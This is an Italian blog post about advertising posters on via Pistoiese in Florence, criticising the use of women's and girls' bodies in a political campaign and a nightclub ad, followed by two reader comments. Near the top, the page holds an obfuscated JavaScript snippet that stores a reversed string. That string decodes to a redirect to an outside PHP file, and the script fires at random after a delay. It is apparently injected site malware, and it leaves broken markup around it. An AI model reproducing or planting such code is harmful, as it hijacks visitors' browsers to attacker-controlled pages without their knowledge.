Il corpo delle donne, in via Pistoiese

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2009/03/poster-con-la-lingua.jpg”>Poster con la lingua
Poster con la lingua

Scendendo la rampa del Ponte all’Indiano in via Pistoiese ci troviamo davanti ad una donna e a una bambina che ci fanno la linguaccia. Ci guardano una da destra,   all’interno di un poster di Matteo Renzi, e l’altra da sinistra, per promuovere la sexy discoteca Excelsior. E’ tutto casuale, ma non capiamo per un’istante qual è la differenza tra le due proposte. Rimaniamo straniti dalla campagna pornografica del candidato sindaco del PD e sorpresi dalla proposta politica di una pornostar, ma forse siamo solo confusi. Forse è vero il contrario.

E’ ce ne andiamo, verso la redazione che abbiamo al centro sociale Il Pozzo, un po’ arrabbiati per l’uso strumentale che comunque viene fatto del corpo delle donne e delle bambine. Dopo tante riflessioni sull’uso a fini pubblicitari delle donne e dei minori, oggi, 24 marzo 2009, tutto sembra essere stato inutile, lo sfruttamento continua.

0 Comments

  1. Cora

    Purtroppo nessuno, nemmeno le donne, fa più caso a questo schifo. Anzi chi si indigna e prova a protestare passa da retrogrado o si becca il consueto insulto di “femminista inacidita”. Personalmente vorrei che il comune negasse gli spazi pubblicitari a chi usa il corpo nudo, o le allusioni sessuali, come strumento di marketing, visto che si accanisce contro chi lo usa per campare… Ma potrei scommettere che nemmeno lo scout Renzi alzerà un dito in questa direzione.

    Reply
  2. Laura

    Effettivamente ci usano, per questo sistema economico, giuridico, politico, tutti abbiamo un prezzo.
    Le donne sono sempre state merce di scambio, ma anche gli uomini…
    insomma parlando più precisamente dell’aspetto campagna politica, mi è sembrato solo molto “senza senso” mettere quelle immagini ma del resto forse è quello che propone un non senso.
    Mah! più di quello di Berlusconi?!

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *